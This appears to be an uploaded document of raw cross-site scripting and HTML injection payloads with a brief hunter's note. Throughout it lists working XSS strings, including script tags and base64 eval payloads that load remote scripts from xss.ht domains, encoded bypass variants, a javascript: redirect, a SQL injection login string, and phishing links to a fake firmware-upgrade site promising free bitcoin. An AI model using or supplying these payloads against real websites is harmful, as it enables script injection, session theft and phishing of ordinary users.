
2022-11-22 PstylecolorredTESTp 2522253e253cscript253ealert0253c Unsigned

The document contains malicious JavaScript code and HTML tags that could be used to perform cross-site scripting (XSS) attacks by injecting client-side scripts. It includes script tags, iframes, and input fields with event handlers that could allow unauthorized access or modification of user data on vulnerable websites.

Uploaded by deepak
Copyright
© Attribution Non-Commercial No-Derivs (BY-NC-ND)

>҉😇Ÿ˜<҉ "><img src=x onError="prompt(1)"><script
src=https://bugvsme.xss.ht></script>

?
utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

%2522%253e%253cscript%253ealert(0)%253c

" === %2522

------------------------------------

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre>

<base href=https://joaxcar.com>

<pre x=&#34;">

<code></code></pre>

<iframe/srcdoc='<script/src=/joaxcar_group/first/-
/jobs/1415515489/artifacts/raw/data/alert.js></script>'>
</iframe>

--------------

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

">
<input%20tabindex=%221%22%20on%00mousemove=alert()%20onm%00ouseover=%22eval(atob(this.id))%22%20id=%22dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnVndnNtZS54c3MuaHQiO

"><input type=image src=x onerror=alert()>

"tabindex="1" onfocus="alert(1)" autofocus"

"><input onfocus=eval(atob(this.id))
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnVndnNtZS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7
autofocus>


\x3Cscript\x3E alert()\x3C/script\x3E

\x3Cscript\x3E src=https://bugvsme.xss.ht >\x3C/script\x3E

/logout_redirect.do?
sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"

<p style="color:red">TEST.</p>

😇Ÿ˜\"<img src=x onError=\"prompt(1)\"</img>😬<script
src=https://bugvsme.xss.ht></script>

>҉😇Ÿ˜<҉ <img%20src=x%20onError="prompt(1)" ">
<script%20src=https://bugvsme.xss.ht></script>

[![<img](https://www.linkpicture.com/q/get-started-button-
1.svg)](https://www.linkpicture.com/q/34643474-rubber-
stamp-with-text-do-not-open-inside-vector-illustration-1.svg)

![<img](https://www.linkpicture.com/q/get-started-button-
1.svg)

"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//

😇Ÿ˜<img src="https://indxss.xss.ht" onError="prompt(1)"
</img>😬

<form id=x tabindex=0 onfocus=print()><input id=attributes>

<iframe id="intercom-frame" style="position: absolute
!important; opacity: 0 !important; width: 1px !important; height:
1px !important; top: 0 !important; left: 0 !important; border:
none !important; display: block !important; z-index: -1
!important; pointer-events: none;" aria-hidden="true"
tabindex="-1" title="Intercom"></iframe>


admin' or '1'='1

"<img/src="https://i.guim.co.uk/img/static/sys-
images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799-
e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg?
width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97ff072d7c5c9ede49cb"
</img>

<b>HACKED</b>

"""```////>"<p><a href="https://i.guim.co.uk/img/static/sys-
images/Guardian/Pix/pictures/2015/11/17/1447761194020/7b368799-
e441-47d7-a52c-2e43d0f985e6-2060x1236.jpeg?
width=465&quality=45&auto=format&fit=max&dpr=2&s=4c277ae5155e97ff072d7c5c9ede49cb"
target=\"iframe_a\">CLICK ME</a></p>

"<b><a href="https://airtel-wifi-firmware-
upgrade.000webhostapp.com/test.html">CLICK HERE TO GET
FREE 1 BTC</a></b>

HTML INJECTION

"<b><a href="https://airtel-wifi-firmware-
upgrade.000webhostapp.com/test.html">CLICK HERE TO GET
FREE 1 BTC</a></b>


USING THIS I CAN DO PHISHING ATTACK

now user can't reply with image in comment section but I can
see how

html injection DISABLE HTML TAG IN COMMENT SECTION

THANK YOU

>҉😇Ÿ˜<҉ "><img src=x onError="prompt(1)">

[email protected]

[YYYY-MM-DD HH:MM]

%2522%253e%253cscript%253ealert(0)%253c
[email protected]

[YYYY-MM-DD HH:MM]
